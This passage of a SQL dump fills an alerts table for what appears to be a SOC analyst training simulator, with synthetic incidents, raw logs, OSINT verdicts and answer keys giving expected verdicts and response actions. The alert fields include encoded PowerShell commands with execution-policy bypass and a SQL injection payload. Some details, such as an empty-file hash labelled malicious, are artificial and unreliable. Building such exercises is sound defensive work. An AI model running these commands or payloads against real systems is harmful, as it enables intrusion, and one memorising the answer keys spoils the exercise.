3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.724Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.103\\\",\\\"internal_user\\\":\\\"jdoe\\\",\\\"accessed_resource\\\":\\\"PublicDatabaseServer\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"data_collector.exe\\\",\\\"action\\\":\\\"AccessGranted\\\",\\\"log_id\\\":\\\"ab12cd34ef56gh78ij90klmnopqr\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1023, 'Aggregated Data Exploitation Risk', 'high', 'Open-source intelligence reports', 'In the final phase of the operation, aggregated data is assessed for potential misuse in targeted campaigns. This data, collected from various sources, poses a significant risk if leveraged for malicious purposes.', 'Data Aggregation Risk', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"filename\":\"report_aggregated_data.csv\",\"user\":\"jdoe\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"data_aggregation\",\"status\":\"completed\"}', '2026-01-17 03:50:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known data exfiltration campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used for data aggregation.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"report_aggregated_data.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Files\",\"verdict\":\"clean\",\"details\":\"File used to store aggregated data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially manipulated data files.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Company Directory\",\"verdict\":\"clean\",\"details\":\"Valid user involved in data aggregation process.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.725Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"filename\\\":\\\"report_aggregated_data.csv\\\",\\\"user\\\":\\\"jdoe\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"action\\\":\\\"data_aggregation\\\",\\\"status\\\":\\\"completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1024, 'APT-Level C2 Communication Using Legitimate Services', 'critical', 'Splunk', 'Detected multi-hop C2 communication using Slack as a relay. Memory-only payloads detected on host.', 'Malware', 'T1090', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-17T02:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"j.doe\",\"hostname\":\"CORP-PC-01\",\"command_line\":\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\",\"domain\":\"slack.com\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1200 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"slack.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain used for C2 relay\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Observed in other fileless malware attacks\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Memory-only payloads and C2 communication through Slack indicate a sophisticated attack.\"}', 'Expert', 'EDR', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.727Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T02:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"j.doe\\\",\\\"hostname\\\":\\\"CORP-PC-01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABvAGIAYwBvAGQAZQAgAD0AIABpAGUAYgBhcwBkOGYAYwBhAGQANwA=\\\",\\\"domain\\\":\\\"slack.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1025, 'Obfuscated PowerShell Script Detected', 'high', 'SentinelOne', 'An obfuscated PowerShell command was executed, indicative of process hollowing techniques.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-17T05:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"username\":\"s.smith\",\"hostname\":\"OFFICE-LAPTOP\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell indicative of process hollowing\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands suggests an attempt to evade detection.\"}', 'Expert', 'EDR', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.728Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T05:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"username\\\":\\\"s.smith\\\",\\\"hostname\\\":\\\"OFFICE-LAPTOP\\\",\\\"command_line\\\":\\\"powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AYQBtAGkAYgBlAG4AdAAgAFMAZQByAHYAZQByAA==\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1026, 'DGA Domain Resolution Detected', 'high', 'Splunk', 'Detected DNS resolution attempts to a domain generated by a Domain Generation Algorithm (DGA).', 'Malware', 'T1568.002', 1, 'New', NULL, '{\"timestamp\":\"2026-01-17T08:10:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.3.20\",\"username\":\"admin-user\",\"hostname\":\"SERVER-01\",\"domain\":\"x3z9s8d7.example.com\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected server\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"x3z9s8d7.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with DGA-based malware campaigns\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"DGA domains are commonly used by malware to evade detection and maintain C2 communication.\"}', 'Expert', 'SIEM', 9, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.730Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T08:10:00Z\\\",\\\"event_type\\\":\\\"dns_query\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"username\\\":\\\"admin-user\\\",\\\"hostname\\\":\\\"SERVER-01\\\",\\\"domain\\\":\\\"x3z9s8d7.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1027, 'Failed Login Attempts from Suspicious Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from a foreign IP, indicative of a potential brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-17T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.101\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC\",\"failed_attempts\":25}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for failed login attempts and brute force activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user in the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"monitor_login_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Multiple failed login attempts from a suspicious IP can indicate a brute force attempt.\"}', 'Expert', 'SIEM', 9, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.731Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-17T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.101\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DC\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1028, 'SQL Injection Attempt on Public-Facing Web Server', 'critical', 'Splunk', 'Detected SQL injection payload in web request targeting a public-facing server. Potential data exfiltration risk.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-17T11:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.4.5\",\"username\":\"unknown\",\"hostname\":\"WEB-SERVER-01\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-17 19:11:07', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous SQL injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted web server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Classic SQL injection payload detected\"}}],\"expected_actions\":[\"block_ip\",\"patch_vulnerability\",\"monitor_web_traffic\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"SQL injection attempts can lead to unauthorized data access and exfiltration.\"}', 'Expert', 'SIEM', 9, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.732Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 